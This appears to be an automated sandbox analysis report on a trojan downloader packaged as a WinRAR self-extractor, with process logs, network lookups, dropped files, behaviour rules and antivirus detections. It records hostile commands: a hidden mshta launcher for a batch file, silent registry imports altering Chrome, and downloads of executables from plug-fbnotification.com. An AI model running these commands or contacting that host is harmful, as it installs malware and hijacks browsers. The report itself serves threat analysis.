Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 27, 2021, 3:43 p.m. | March 27, 2021, 3:48 p.m. |
Process | PID | Command line |
---|---|---|
regedit.exe | 2760 | regedit /s chrome.reg |
taskkill.exe | 2888 | TASKKILL /F /IM chrome.exe |
chrome.exe | 1444 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef1c6f1e8,0x7fef1c6f1f8,0x7fef1c6f208 |
chrome.exe | 1684 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2696 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 |
regedit.exe | 1296 | regedit /s chrome-set.reg |
explorer.exe | 1848 | C:\Windows\Explorer.EXE |
Name | Response | Post-Analysis Lookup |
---|---|---|
get.geojs.io | 172.67.70.233 | |
www.plug-fbnotification.com | CNAME plug-fbnotification.com; 35.220.162.170 | |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49199 172.67.70.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | e8:2c:6d:12:8c:c5:ce:c7:42:39:90:96:aa:d5:c8:a2:5f:50:74:73 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
section | .didat |
resource name | PNG |
request | GET http://www.plug-fbnotification.com/coloqaq/parse.exe |
request | GET http://www.plug-fbnotification.com/coloqaq/curl.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\2772-1616827593802750.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-605EE790-AD4.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\15ff4248-f9e3-481d-9f1f-ee763326d2b2.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
name | language | sublanguage | filetype | offset | size |
---|---|---|---|---|---|
PNG | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | 0x0006418c | 0x000015a9 |
RT_ICON | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | 0x0006aea8 | 0x00003d71 |
RT_DIALOG | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0006f324 | 0x000001e6 |
RT_STRING | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0006fc3c | 0x00000078 |
RT_GROUP_ICON | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0006fcb4 | 0x00000068 |
RT_MANIFEST | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | XML 1.0 document, ASCII text, with CRLF line terminators | 0x0006fd1c | 0x00000753 |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge-set.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\vcruntime140_1.dll |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome7.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome-set.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge64.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge86.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome86.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome64.bat |
cmdline | mshta vbscript:createobject("wscript.shell").run("chrome86.bat h",0)(window.close) |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |
section | .rsrc (virtual_address 0x00063000, virtual_size 0x0000d470, size_of_data 0x0000d600) | entropy | 6.855402526678264 | description | A section with a high entropy has been found |
rule | description |
---|---|
inject_thread | Code injection with CreateRemoteThread in a remote process |
create_service | Create a windows service |
create_com_service | Create a COM server |
network_udp_sock | Communications over UDP network |
network_tcp_listen | Listen for incoming communication |
network_p2p_win | Communications over P2P network |
network_http | Communications over HTTP |
network_dropper | File downloader/dropper |
network_ftp | Communications over FTP |
network_tcp_socket | Communications over RAW socket |
network_dns | Communications use DNS |
network_dga | Communication using dga |
escalate_priv | Escalate privileges |
screenshot | Take screenshot |
keylogger | Run a keylogger |
cred_local | Steal credential |
sniff_audio | Record Audio |
migrate_apc | APC queue tasks migration |
spreading_file | Malware can spread east-west file |
spreading_share | Malware can spread east-west using share drive |
win_mutex | Create or check mutex |
win_registry | Affect system registries |
win_token | Affect system token |
win_private_profile | Affect private profile |
win_files_operation | Affect private profile |
Str_Win32_Winsock2_Library | Match Winsock 2 API library declaration |
Str_Win32_Wininet_Library | Match Windows Inet API library declaration |
Str_Win32_Internet_API | Match Windows Inet API call |
Str_Win32_Http_API | Match Windows Http API call |
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerCheck__RemoteAPI | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
DebuggerException__ConsoleCtrl | (no description) |
DebuggerException__SetConsoleCtrl | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
Check_Dlls | (no description) |
anti_dbg | Checks if being debugged |
antisb_threatExpert | Anti-Sandbox checks for ThreatExpert |
disable_dep | Bypass DEP |
win_hook | Affect hook table |
cmdline | chrome86.bat h |
cmdline | TASKKILL /F /IM chrome.exe |
cmdline | mshta vbscript:createobject("wscript.shell").run("chrome86.bat h",0)(window.close) |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef1c6f1e8,0x7fef1c6f1f8,0x7fef1c6f208 |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2696 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1196,10079241022053997144,2061932017762601018,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=1ED90E1F7EF73F81C1DF9FD996F985E0 --mojo-platform-channel-handle=1204 --ignored=" --type=renderer " /prefetch:2 |
url | http://127.0.0.1 |
Engine | Detection |
---|---|
Bkav | W32.AIDetect.malware1 |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.Rasftuby.Gen.14 |
Zillya | Trojan.ScriptKD.JS.10 |
Sangfor | Trojan.Win32.Save.a |
Cybereason | malicious.72d5f4 |
Arcabit | Trojan.Rasftuby.Gen.14 |
APEX | Malicious |
Avast | Win64:RATX-gen [Trj] |
ClamAV | Win.Malware.Rasftuby-9828908-0 |
Kaspersky | HEUR:Trojan.Win32.Runner.vho |
BitDefender | Trojan.Rasftuby.Gen.14 |
Ad-Aware | Trojan.Rasftuby.Gen.14 |
Sophos | ML/PE-A |
F-Secure | Trojan.TR/Dldr.Agent.sbdjj |
DrWeb | Trojan.PWS.Stealer.29941 |
McAfee-GW-Edition | BehavesLike.Win32.Generic.dc |
FireEye | Generic.mg.762ab2472d5f4811 |
Emsisoft | Trojan.Rasftuby.Gen.14 (B) |
eGambit | Unsafe.AI_Score_93% |
Avira | TR/Dldr.Agent.sbdjj |
MAX | malware (ai score=81) |
Antiy-AVL | Trojan[Downloader]/Win64.Agent |
Microsoft | Trojan:Win32/Wacatac.DE!ml |
ZoneAlarm | HEUR:Trojan.Win32.Runner.vho |
GData | Win32.Trojan-Downloader.Generic.H6XZVZ |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Malware/Win32.RL_Generic.R360804 |
ALYac | Trojan.Rasftuby.Gen.14 |
Malwarebytes | Trojan.BrowserModifier.SFX |
ESET-NOD32 | a variant of Win64/TrojanDownloader.Agent.IH |
Rising | Downloader.Agent!8.B23 (CLOUD) |
Yandex | Trojan.DL.Agent!VGwPhdfUXzA |
Fortinet | W64/Agent.IH!tr.dldr |
AVG | Win64:RATX-gen [Trj] |
dead_host | 35.220.162.170:8070 |
dead_host | 192.168.56.101:49209 |
dead_host | 35.220.162.170:8080 |
dead_host | 192.168.56.101:49208 |